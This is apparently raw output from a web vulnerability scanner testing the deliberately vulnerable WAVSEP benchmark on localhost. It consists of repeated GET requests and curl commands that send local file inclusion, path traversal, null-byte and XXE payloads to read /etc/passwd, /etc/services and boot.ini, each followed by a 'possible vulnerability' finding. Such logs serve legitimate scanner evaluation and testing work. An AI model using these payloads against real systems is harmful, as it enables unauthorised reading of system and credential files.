GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
